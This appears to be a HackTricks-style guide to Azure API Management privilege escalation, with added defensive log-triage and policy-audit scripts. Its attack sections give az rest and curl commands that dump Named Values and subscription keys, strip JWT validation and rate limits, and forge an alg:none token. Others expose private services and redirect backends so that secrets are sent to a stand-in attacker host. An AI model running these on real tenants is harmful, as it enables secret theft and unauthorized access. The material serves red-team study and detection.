Az - API Management Privesc

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Microsoft.ApiManagement/service/namedValues/read & Microsoft.ApiManagement/service/namedValues/listValue/action

The attack consists of obtaining sensitive secrets stored in Azure API Management Named Values, either by reading them directly or by abusing permissions to retrieve secrets stored in Key Vault through managed identities.

az apim nv show-secret --resource-group <resource-group> --service-name <service-name> --named-value-id <named-value-id>

Microsoft.ApiManagement/service/subscriptions/read & Microsoft.ApiManagement/service/subscriptions/listSecrets/action

For each subscription, an attacker can obtain the subscription keys by calling the listSecrets endpoint with a POST request:

az rest --method POST \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<subscription-sid>/listSecrets?api-version=2024-05-01"

The response includes the subscription's primary key (primaryKey) and secondary key (secondaryKey). With these keys, an attacker can authenticate and reach the APIs published through the API Management Gateway:

curl -H "Ocp-Apim-Subscription-Key: <primary-key-or-secondary-key>" \
https://<service-name>.azure-api.net/<api-path>

The attacker can reach every API and product associated with the subscription. If the subscription has access to sensitive products or APIs, the attacker can obtain confidential information or perform unauthorized operations.
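Every operation on this page (the section headings are the operation names) is recorded in the Azure Activity Log, so a defender can alert on it. The following is an added example, not part of the original page: a triage over constructed Activity Log records (the export record shape, the SENSITIVE_OPS set, BULK_THRESHOLD and the sample callers are assumptions) that flags successful sensitive operations and bulk secret retrieval per caller.

```python
import json
from collections import defaultdict

# Operations named in this page's section headings; each surfaces in the
# Activity Log as operationName.value.
SENSITIVE_OPS = {
    "Microsoft.ApiManagement/service/namedValues/listValue/action",
    "Microsoft.ApiManagement/service/subscriptions/listSecrets/action",
    "Microsoft.ApiManagement/service/policies/write",
    "Microsoft.ApiManagement/service/apis/policies/write",
    "Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action",
    "Microsoft.ApiManagement/service/backends/write",
}
BULK_THRESHOLD = 3  # assumption: secret pulls per caller that deserve an alert

def event(caller, op, resource, status="Succeeded"):
    """Build one record in the Activity Log export shape (constructed sample data)."""
    return {"caller": caller, "operationName": {"value": op},
            "resourceId": resource, "status": {"value": status}}

SAMPLE_EVENTS = [  # constructed: a benign read, a bulk key dump, a policy edit, a failed write
    event("alice@example.com", "Microsoft.ApiManagement/service/read", "apim-prod"),
    event("svc-ci@example.com", "Microsoft.ApiManagement/service/subscriptions/listSecrets/action", "apim-prod/subscriptions/sub-1"),
    event("svc-ci@example.com", "Microsoft.ApiManagement/service/subscriptions/listSecrets/action", "apim-prod/subscriptions/sub-2"),
    event("svc-ci@example.com", "Microsoft.ApiManagement/service/namedValues/listValue/action", "apim-prod/namedValues/db-password"),
    event("bob@example.com", "Microsoft.ApiManagement/service/apis/policies/write", "apim-prod/apis/orders/policies/policy"),
    event("mallory@example.com", "Microsoft.ApiManagement/service/backends/write", "apim-prod/backends/orders", status="Failed"),
]

def triage(events):
    """Return {caller: [alerts]} for successful sensitive APIM operations."""
    alerts = defaultdict(list)
    secret_pulls = defaultdict(int)
    for ev in events:
        op = ev["operationName"]["value"]
        if op not in SENSITIVE_OPS or ev["status"]["value"] != "Succeeded":
            continue  # failed attempts are worth logging, but not alerting on here
        caller = ev.get("caller", "unknown")
        alerts[caller].append(f"{op} on {ev['resourceId']}")
        if op.endswith(("/listSecrets/action", "/listValue/action")):
            secret_pulls[caller] += 1
    for caller, n in secret_pulls.items():
        if n >= BULK_THRESHOLD:
            alerts[caller].append(f"bulk secret retrieval: {n} listSecrets/listValue calls")
    return dict(alerts)

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_EVENTS), indent=2))
```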

Microsoft.ApiManagement/service/policies/write or Microsoft.ApiManagement/service/apis/policies/write

The attacker first retrieves the current API policy:

az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01&format=rawxml"

An attacker can modify the policy in several ways depending on their goals. For example, to disable authentication when the policy includes JWT token validation, the attacker can remove that section or comment it out:

<policies>
    <inbound>
        <base />
        <!-- JWT validation removed by the attacker -->
        <!-- <validate-jwt header-name="Authorization" failed-validation-httpcode="401" >
            ...
        </validate-jwt> -->
    </inbound>
    <backend>
        <base />
    </backend>
    <outbound>
        <base />
    </outbound>
    <on-error>
        <base />
    </on-error>
</policies>

To remove the rate-limiting controls and make denial-of-service attacks possible, the attacker can remove or comment out the quota and rate-limit policies:

<policies>
    <inbound>
        <base />
        <!-- Rate limiting removed by the attacker -->
        <!-- <rate-limit calls="100" renewal-period="60" />
        <quota-by-key calls="1000" renewal-period="3600" counter-key="@(context.Subscription.Id)" /> -->
    </inbound>
    ...
</policies>

To change the backend route and redirect traffic to an attacker-controlled server:

<policies>
    ...
    <inbound>
        <base />
        <set-backend-service base-url="https://attacker-controlled-server.com" />
    </inbound>
    ...
</policies>

The attacker then applies the modified policy. The request body must be a JSON object that carries the policy in XML format:

az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
    "properties": {
        "format": "rawxml",
        "value": "<policies><inbound><base /></inbound><backend><base /></backend><outbound><base /></outbound><on-error><base /></on-error></policies>"
    }
}'

JWT Validation Misconfiguration

The attacker needs to know that the API uses JWT token validation and that the policy is misconfigured. Misconfigured JWT validation policies may carry require-signed-tokens="false" or require-expiration-time="false", which lets the service accept unsigned tokens or tokens with no expiration time.

The attacker crafts a malicious JWT token using the none algorithm (unsigned):

# Header: {"alg":"none"}
# Payload: {"sub":"user"}
eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0.

The attacker sends a request to the API with the malicious token:

curl -X GET \
-H "Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0." \
https://<apim>.azure-api.net/path

If the policy is misconfigured with require-signed-tokens="false", the service accepts the unsigned token. The attacker can likewise craft a token without an expiration claim if require-expiration-time="false".
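Both the policy tampering and the JWT misconfiguration above are visible in the rawxml policy that the GET call returns, so it can be audited before and after every policy write. The following is an added example, not the page's own code: audit_policy (an assumed helper name) flags a missing validate-jwt, rate-limit or quota policy, require-signed-tokens or require-expiration-time set to false, a set-backend-service outside an allowlist, and controls that survive only inside an XML comment; the sample policy and the allowlist are constructed.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: JWT validation commented out, rate limiting gone and the
# backend redirected, i.e. the tampered policies shown above rolled into one document.
TAMPERED_POLICY = """<policies>
  <inbound>
    <base />
    <!-- <validate-jwt header-name="Authorization" failed-validation-httpcode="401" /> -->
    <set-backend-service base-url="https://attacker-controlled-server.com" />
  </inbound>
  <backend><base /></backend>
  <outbound><base /></outbound>
  <on-error><base /></on-error>
</policies>"""

ALLOWED_BACKEND_HOSTS = {"api.internal.example.com"}  # assumption: your known backend hosts
COMMENTED_CONTROL = re.compile(r"<!--\s*<(validate-jwt|rate-limit|quota)")

def audit_policy(xml_text, allowed_hosts=ALLOWED_BACKEND_HOSTS):
    """Return a list of findings for one APIM policy document (rawxml format)."""
    findings = []
    root = ET.fromstring(xml_text)  # ElementTree drops XML comments, so commented-out policies vanish
    inbound = root.find("inbound")
    if inbound is None:
        return ["no <inbound> section"]
    jwt = inbound.find("validate-jwt")
    if jwt is None:
        findings.append("no validate-jwt in inbound: requests are not authenticated here")
    else:  # APIM defaults both attributes to true; an explicit false is the weak setting
        if jwt.get("require-signed-tokens", "true").lower() == "false":
            findings.append("validate-jwt accepts unsigned tokens (alg=none)")
        if jwt.get("require-expiration-time", "true").lower() == "false":
            findings.append("validate-jwt accepts tokens without an exp claim")
    if inbound.find("rate-limit") is None and inbound.find("rate-limit-by-key") is None:
        findings.append("no rate-limit policy in inbound")
    if inbound.find("quota") is None and inbound.find("quota-by-key") is None:
        findings.append("no quota policy in inbound")
    for node in root.iter("set-backend-service"):
        host = re.sub(r"^https?://", "", node.get("base-url", "")).split("/")[0]
        if host and host not in allowed_hosts:
            findings.append(f"set-backend-service points at unexpected host {host}")
    if COMMENTED_CONTROL.search(xml_text):
        findings.append("a security policy survives only inside an XML comment (tampering signal)")
    return findings

if __name__ == "__main__":
    for f in audit_policy(TAMPERED_POLICY):
        print("FINDING:", f)
```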

Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action

The attacker first inspects the service's network configuration:

az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01"

The attacker reviews the JSON response to check the values of publicNetworkAccess and virtualNetworkType. If publicNetworkAccess is set to false or virtualNetworkType is set to Internal, the service is configured for private access.

To expose the service to the Internet, the attacker must change both settings. If the service runs in internal mode (virtualNetworkType: "Internal"), the attacker changes it to None or External and enables publicNetworkAccess. This can be done through the Azure Management API:

az rest --method PATCH \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
    "properties": {
        "publicNetworkAccess": "Enabled",
        "virtualNetworkType": "None"
    }
}'

Once virtualNetworkType is set to None or External and publicNetworkAccess is enabled, the service and all of its APIs become reachable from the Internet, even if they were previously protected behind a private network or private endpoints.

Microsoft.ApiManagement/service/backends/write

The attacker first lists the existing backends to decide which one to modify:

az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends?api-version=2024-05-01"

The attacker retrieves the current configuration of the backend they want to modify:

az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01"

The attacker changes the backend URL to point it at a server under their control. First they take the ETag from the previous response, then they update the backend:

az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
    "properties": {
        "url": "https://attacker-controlled-server.com",
        "protocol": "http",
        "description": "Backend modified by attacker"
    }
}'

Alternatively, the attacker can configure backend headers to exfiltrate secret Named Values. This is done through the backend credentials configuration:

az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
    "properties": {
        "url": "https://attacker-controlled-server.com",
        "protocol": "http",
        "credentials": {
            "header": {
                "X-Secret-Value": ["{{named-value-secret}}"]
            }
        }
    }
}'

With this configuration, the Named Values are sent as headers on every request to the attacker-controlled backend, which enables exfiltration of sensitive secrets.
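The network-exposure change and the backend rewrite both show up in the JSON that the GET calls in these two sections return, so they can be checked on a schedule or after every write. The following is an added example, not part of the original page: audit_service and audit_backends (assumed names) flag a service reachable from the Internet, backends whose host lies outside an allowlisted domain, and credential headers that reference Named Values; the sample responses and the allowlist are constructed.

```python
import json
import re
from urllib.parse import urlparse

# Constructed sample responses; the shape follows the ARM resources returned by
# the GET calls above, the values are made up.
SERVICE_JSON = json.dumps({"name": "apim-prod", "properties": {
    "publicNetworkAccess": "Enabled", "virtualNetworkType": "None"}})
BACKENDS_JSON = json.dumps({"value": [
    {"name": "orders", "properties": {"url": "https://orders.internal.example.com",
                                      "protocol": "http"}},
    {"name": "orders-v2", "properties": {"url": "https://attacker-controlled-server.com",
                                         "protocol": "http",
                                         "credentials": {"header": {"X-Secret-Value": ["{{named-value-secret}}"]}}}},
]})

ALLOWED_BACKEND_DOMAINS = ("internal.example.com",)  # assumption: domains your backends live under
NAMED_VALUE_REF = re.compile(r"\{\{[^}]+\}\}")  # {{name}} is expanded from a Named Value at runtime

def is_private(props):
    """A service is private when public access is off or it sits in an internal VNet."""
    pna = str(props.get("publicNetworkAccess", "Enabled")).lower()  # ARM reports Enabled/Disabled
    return pna in ("disabled", "false") or props.get("virtualNetworkType") == "Internal"

def audit_service(service_json):
    props = json.loads(service_json)["properties"]
    if is_private(props):
        return []
    return [f"service reachable from the Internet (publicNetworkAccess={props.get('publicNetworkAccess')}, "
            f"virtualNetworkType={props.get('virtualNetworkType')})"]

def audit_backends(backends_json, allowed_domains=ALLOWED_BACKEND_DOMAINS):
    findings = []
    for backend in json.loads(backends_json)["value"]:
        name, props = backend["name"], backend["properties"]
        host = urlparse(props.get("url", "")).hostname or ""
        if not any(host == d or host.endswith("." + d) for d in allowed_domains):
            findings.append(f"backend {name}: url host {host!r} is not an approved backend")
        headers = props.get("credentials", {}).get("header", {})
        for hdr, values in headers.items():
            if any(NAMED_VALUE_REF.search(v) for v in values):
                findings.append(f"backend {name}: header {hdr} forwards a Named Value to the backend")
    return findings

if __name__ == "__main__":
    for f in audit_service(SERVICE_JSON) + audit_backends(BACKENDS_JSON):
        print("FINDING:", f)
```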
